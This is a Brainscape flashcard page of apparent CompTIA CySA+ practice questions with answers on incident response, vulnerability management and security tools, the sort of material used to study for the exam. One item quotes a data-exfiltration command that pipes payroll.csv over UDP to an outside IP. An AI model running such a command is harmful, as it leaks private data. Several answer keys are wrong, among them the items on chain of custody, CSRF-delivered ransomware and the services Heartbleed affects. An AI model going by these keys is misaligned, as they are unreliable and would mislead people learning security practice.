Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

CYSA-001 > Comptia Exam Test > Flashcards

Comptia Exam Test Flashcards

1
Q

Question312
Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A. Antivirus
B. HIPS
C. Firewall
D. Proxy

A

C. Firewall

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Question313
Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario?

A. Continue to monitor security devices
B. Update antivirus and malware definitions
C. Provide security awareness training
D. Migrate email services to a hosted environment

A

C. Provide security awareness training

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Question314
A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted tools and skillsets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program?

A. Establish continuous monitoring
B. Update vulnerability feed
C. Perform information classification
D. Establish corporate policy

A

D. Establish corporate policy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Question317
An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?

A. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
B. Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
C. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
D. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

A

D. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Question319
A suite of three production servers that were originally configured identically underwent the same vulnerability scans. However, recent results revealed the three servers have different critical vulnerabilities. The servers are not accessible by the Internet, and AV programs have not detected any malware. The server’s syslog files do not show any unusual traffic since they were installed and are physically isolated in an off-site datacenter. Checksum testing of random executables does not reveal tampering. Which of the following scenarios is MOST likely?

A. Servers have not been scanned with the latest vulnerability signature
B. Servers have been attacked by outsiders using zero-day vulnerabilities
C. Servers were made by different manufacturers
D. Servers have received different levels of attention during previous patch management events

A

D. Servers have received different levels of attention during previous patch management events

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Question320
Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Choose three.)

A. Multifactor authentication
B. Network segmentation
C. Single sign-on
D. Encryption
E. Complexity policy
F. Biometrics
G. Obfuscation
A

A. Multifactor authentication
E. Complexity policy
F. Biometrics

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Question322
A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

A. Computer forensics form
B. HIPAA response form
C. Chain of custody form
D. Incident form

A

B. HIPAA response form

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Question325
A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

A. Access control policy
B. Account management policy
C. Password policy
D. Data ownership policy

A

C. Password policy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Question332
Which of the following command-line utilities would an analyst use on an end-user PC to determine the ports it is listening on?

A. tracert
B. ping
C. nslookup
D. netstat

A

D. netstat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Question334
During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

A. RADIUS identity management
B. Context-based authentication
C. Privilege escalation restrictions
D. Elimination of self-service password resets

A

B. Context-based authentication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Question335
The human resources division is moving all of its applications to an IaaS cloud. The Chief Information Officer (CIO) has asked the security architect to design the environment securely to prevent the IaaS provider from accessing its data-at-rest and data-in-transit within the infrastructure. Which of the following security controls should the security architect recommend?

A. Implement a non-data breach agreement
B. Ensure all backups are remote outside the control of the IaaS provider
C. Ensure all of the IaaS providers workforce passes stringent background checks
D. Render data unreadable through the use of appropriate tools and techniques

A

D. Render data unreadable through the use of appropriate tools and techniques

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Question336
An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?

A. Create a third environment between development and production that mirrors production and tests all changes before deployment to the users
B. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production
C. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment
D. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities

A

A. Create a third environment between development and production that mirrors production and tests all changes before deployment to the users

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Question338
A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

A. Phishing
B. Whaling
C. Spam
D. Ransomware

A

B. Whaling

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Question339
When reviewing the system logs, the cybersecurity analyst noticed a suspicious log entry:
wmic /node: HRDepartment1 computersystem get username
Which of the following combinations describes what occurred, and what action should be taken in this situation?

A. A rogue user has queried for users logged in remotely. Disable local access to network shares.
B. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
C. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt.
D. A rogue user has queried for users logged into in remotely. Attempt to determine who executed the command.

A

D. A rogue user has queried for users logged into in remotely. Attempt to determine who executed the command.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Question340
The security team has determined that the current incident response resources cannot meet managements objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensating controls can be used to help meet management’s expectations?

A. Separation of duties
B. Scheduled reviews
C. Dual control
D. Outsourcing

A

D. Outsourcing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Question341
Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process?

A. To comply with existing organizational policies and procedures on interacting with internal and external parties
B. To ensure all parties know their roles and effective lines of communication are established
C. To identify which group will communicate details to law enforcement in the event of a security incident
D. To predetermine what details should or should not be shared with internal or external parties in the event of an incident

A

A. To comply with existing organizational policies and procedures on interacting with internal and external parties

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Question344
The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this?

A. A control
B. A standard
C. A policy
D. A guideline

A

C. A policy

18
Q

Question345
During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test questioned the legitimacy of the team.
Which of the following information should be shown to the officer?

A. Letter of engagement
B. Scope of work
C. Timing information
D. Team reporting

A

A. Letter of engagement

19
Q

Question346
A security analyst is performing a stealth black-box audit of the local WiFi network and is running a wireless sniffer to capture local WiFi network traffic from a specific wireless access point. The SSID is not appearing in the sniffing logs of the local wireless network traffic. Which of the following is the best action that should be performed NEXT to determine the SSID?

A. Set up a fake wireless access point
B. Power down the wireless access point
C. Deauthorize users of that access point
D. Spoof the MAC addresses of adjacent access points

A

A. Set up a fake wireless access point

20
Q

Question347
An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

A. whois
B. netstat
C. nmap
D. nslookup

A

C. nmap

21
Q

Question348
A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?

A. Fuzzing
B. Input validation
C. Change control
D. Sandboxing

A

C. Change control

22
Q

Question349
A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

A. Advanced persistent threat
B. Zero day
C. Trojan
D. Logic bomb

A

B. Zero day

23
Q

Question350
During a tabletop exercise, it is determined that a security analyst is required to ensure patching and scan reports are available during an incident, as well as documentation of all critical systems. To which of the following stakeholders should the analyst provide the reports?

A. Management
B. Affected vendors
C. Security operations
D. Legal

A

A. Management

24
Q

Question351
An employee was conducting research on the Internet when a message from cybercriminals appeared on the screen, stating the hard drive was just encrypted by a ransomware variant. An analyst observes the following:
- Antivirus signatures were updated recently
- The desktop background was changed
- Web proxy logs show browsing to various information security sites and ad network traffic
- There is a high volume of hard disk activity on the file server
SMTP server showed the employee recently received several emails from blocked senders
- The company recently switched web hosting providers
- There are several IPS alerts for external port scans

Which of the following describes how the employee got this type of ransomware?

A. The employee fell victim to a CSRF attack
B. The employee was using other users credentials
C. The employee opened an email attachment
D. The employee updated antivirus signatures

A

A. The employee fell victim to a CSRF attack

25
Q

Question353
An organization subscribes to multiple third-party security intelligence feeds. It receives a notification from one of these feeds indicating a zero-day malware attack is impacting the SQL server prior to SP 2. The notification also indicates that infected systems attempt to communicate to external IP addresses on port 2718 to download the additional payload. After consulting with the organization’s database administrator, it is determined that there are several SQL servers that are still on SP 1, and none of the SQL servers would normally communicate over port 2718. Which of the following is the BEST mitigation step to implement until the SQL servers can be upgraded to SP 2 with minimal impact on the network?

A. Create alert rules on the IDS for all outbound traffic on port 2718 from the IP addresses if the SQL servers running SQL SP 1
B. On the organization’s firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1
C. Place all the SQL servers running SP 1 on a separate subnet On the firewalls, create a new rule blocking connections to destination addresses external to the organization’s network
D. On the SQL servers running SP 1, install vulnerability scanning software

A

B. On the organizations firewalls, create a new rule that blocks outbound traffic on port 2718 from the IP addresses of the servers running SQL SP 1

26
Q

Question354
Which of the following is a vulnerability that is specific to hypervisors?

A. DDoS
B. VLAN hopping
C. Weak encryption
D. WMescape

A

D. WMescape

27
Q

Question355
An organization is performing vendor selection activities for penetration testing, and a security analyst is reviewing the MOA and rules of engagement, which were supplied with proposals. Which of the following should the analyst expect will be included in the documents and why?

A. The scope of the penetration test should be included in the MOA to ensure penetration testing is conducted against only specifically authorized network resources.
B. The MOA should address the client SLA in relation to reporting results to regulatory authorities, including issuing banks for organizations that process cardholder data.
C. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.
D. The exploitation standards should be addressed in the rules of engagement to ensure both parties are aware of the depth of exploitation that will be attempted by penetration testers.

A

C. The rules of engagement should include detailed results of the penetration scan, including all findings, as well as the designation of whether vulnerabilities identified during the scanning phases are found to be exploitable during the penetration test.

28
Q

Question356
A manufacturing company has decided to participate in direct sales of its products to consumers. The company decides to use a subdomain of its main site with its existing cloud
service provider as the portal for e-commerce. After launch, the site is stable and functions properly, but after a robust day of sales, the site begins to redirect to competitors landing
page. Which of the following actions should the company’s security team take to determine the cause of the issue and minimize the scope of impact?

A. Engage a third party to provide penetration testing services to see if an exploit can be found
B. Check DNS records to ensure Cname or alias records are in place for the subdomain
C. Query the cloud provider to determine the nature of the DNS attack and find out which other clients are affected
D. Check the DNS records to ensure a correct MX record is established for the subdomain

A

B. Check DNS records to ensure Cname or alias records are in place for the subdomain

29
Q

Question357
An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?

A. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account
B. The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server
C. The license for the application has expired, and the failed logins will continue to occur until a new license key is installed on the application
D. A successful malware attack has provided someone access to the network, and failed login attempts are an indication of an attempt to privilege access to the application

A

A. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account

30
Q

Question359
A company requests a security assessment of its network. Permission is given, but no details are provided. It is discovered that the company has a web presence, and the companys IP address is 70.182.11.4. Which of the following Nmap commands would reveal common open ports and their versions?

A. nmap – oV
B. nmap -vO
C. nmap -sv

A

C. nmap -sv

31
Q

Question360
During a red team engagement, a penetration tester found a production server. Which of the following portions of the SOW should be referenced to see if the server should be part of the testing engagement?

A. Authorization
B. Exploitation
C. Communication
D. Scope

A

D. Scope

32
Q

Question361
The IT department at a growing law firm wants to begin using a third-party vendor for vulnerability monitoring and mitigation. The executive director of the law firm wishes to outline the assumptions and expectations between the two companies. Which of the following documents might be referenced in the event of a security breach at the law firm?

A. SLA
B. MOU
C. SOW
D. NDA

A

A. SLA

33
Q

Question362
A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A. nmap A sV 192.168.1.235
B. cat payroll.csv > /dev/udp/123.456.123.456/53
C. cat/etc/passwd
D. mysql h 192.168.1.235 u test -p

A

B. cat payroll.csv > /dev/udp/123.456.123.456/53

34
Q

Question364
A company office was broken into over the weekend. The office manager contacts the IT security group to provide details on which servers were stolen. The security analyst determines one of the stolen servers contained a list of customer PII information, and another server contained a copy of the credit card transactions processed on the Friday before the break-in. In addition to potential security implications of information that could be gleaned from those servers and the rebuilding/restoring of the data on the stolen systems, the analyst needs to determine any communication or notification requirements with respect to the incident. Which of the following items is MOST important when determining what information needs to be provided, who should be contacted, and when the communication needs to occur.

A. Total number of records stolen
B. Government and industry regulations
C. Impact on the reputation of the company’s name/brand
D. The monetary value of data stolen

A

B. Government and industry regulations

35
Q

Question366
A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process prior to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Choose two.)

A. Breach of confidentiality and market risks can occur if the potential acquisition is leaked to the press.
B. The parent company is only going through this process to identify and steal the intellectual property of the smaller company.
C. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
D. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
E. The industry regulator may decide that the acquisition will result in an unfair competitive advantage if the acquisition were to take place.
F. The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

A

E. The industry regulator may decide that the acquisition will result in an unfair competitive advantage if the acquisition were to take place.
F. The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

36
Q

Question369
A Chief Executive Officer (CEO) wants to implement BYOD in the environment. Which of the following options should the security analyst suggest to protect corporate data on these devices? (Choose two.)

A. Disable VPN connectivity on the device.
B. Disable Bluetooth on the device.
C. Disable near-field communication on the device.
D. Enable MDM/MAM capabilities.
E. Enable email services on the device.
F. Enable encryption on all devices.

A

D. Enable MDM/MAM capabilities.

F. Enable encryption on all devices.

37
Q

Question370
A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement corrective control. Which of the following would be the MOST inhibiting to applying the fix?

A. Requiring a firewall reboot.
B. Resetting all administrator passwords.
C. Business process interruption.
D. Full desktop backups.

A

D. Full desktop backups.

38
Q

Question371
A security analyst is assisting in the redesign of a network to make it more secure. The solution should be low cost, and access to the secure segments should be easily monitored, secured, and controlled. Which of the following should be implemented?

A. System isolation
B. Honeyport
C. Jump box
D. Mandatory access control

A

C. Jump box

39
Q

Question372
A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would be appropriate to use in this case?

A. MSBA
B. SHA1sum
C. FIM
D. DLP

A

B. SHA1sum

40
Q

Question373
Which of the following systems or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability (Choose two.)

A. SSH daemons
B. Web servers
C. Modbus devices
D. TLS VPN services
E. IPSec VPN concentrators
F. SMB service
A

D. TLS VPN services

F. SMB service

CYSA-001 (3 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions